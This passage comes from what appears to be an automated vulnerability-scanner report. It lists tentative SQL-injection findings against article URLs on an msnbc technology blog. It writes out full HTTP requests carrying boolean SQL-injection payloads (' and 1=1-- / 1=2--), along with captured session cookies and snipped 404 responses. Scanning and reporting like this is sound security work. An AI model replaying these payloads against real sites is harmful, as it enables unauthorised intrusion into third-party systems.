                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

Request 2

GET /_news/2010%20and%201%3d2--%20/08/16/4904611-north-korea-welcome-to-twitter HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:35:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39911

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1754540373&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1754540373&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href=
...[SNIP]...

1.79. http://technolog.msnbc.redacted/_news/2010/08/16/4904611-north-korea-welcome-to-twitter [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://technolog.msnbc.redacted
Path:   /_news/2010/08/16/4904611-north-korea-welcome-to-twitter

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 17360674%20or%201%3d1--%20 and 17360674%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /_news/2010/0817360674%20or%201%3d1--%20/16/4904611-north-korea-welcome-to-twitter HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:35:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39897

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=823962262&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=823962262&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

Request 2

GET /_news/2010/0817360674%20or%201%3d2--%20/16/4904611-north-korea-welcome-to-twitter HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:35:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39909

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=906723894&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=906723894&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

1.80. http://technolog.msnbc.redacted/_news/2010/08/16/4904611-north-korea-welcome-to-twitter [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://technolog.msnbc.redacted
Path:   /_news/2010/08/16/4904611-north-korea-welcome-to-twitter

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /_news/2010/08/16'%20and%201%3d1--%20/4904611-north-korea-welcome-to-twitter HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:36:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39907

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1838711579&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1838711579&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href=
...[SNIP]...

Request 2

GET /_news/2010/08/16'%20and%201%3d2--%20/4904611-north-korea-welcome-to-twitter HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=299
Date: Sun, 30 Jan 2011 02:36:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39897

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=348724747&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=348724747&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

1.81. http://technolog.msnbc.redacted/_news/2010/08/30/5002284-thinkpad-maker-lenovo-creating-ebox-game-console [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://technolog.msnbc.redacted
Path:   /_news/2010/08/30/5002284-thinkpad-maker-lenovo-creating-ebox-game-console

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /_news/2010%20and%201%3d1--%20/08/30/5002284-thinkpad-maker-lenovo-creating-ebox-game-console HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:25:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39911

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1942292609&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1942292609&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="
...[SNIP]...

Request 2

GET /_news/2010%20and%201%3d2--%20/08/30/5002284-thinkpad-maker-lenovo-creating-ebox-game-console HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:25:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39899

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1829603836&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1829603836&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="
...[SNIP]...

1.82. http://technolog.msnbc.redacted/_news/2011/01/24/5907778-apple-calls-to-award-woman-10k-she-hangs-up [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://technolog.msnbc.redacted
Path:   /_news/2011/01/24/5907778-apple-calls-to-award-woman-10k-she-hangs-up

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /_news/2011/01/24'%20and%201%3d1--%20/5907778-apple-calls-to-award-woman-10k-she-hangs-up HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:31:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39911

<!DOCTYPE HTML>
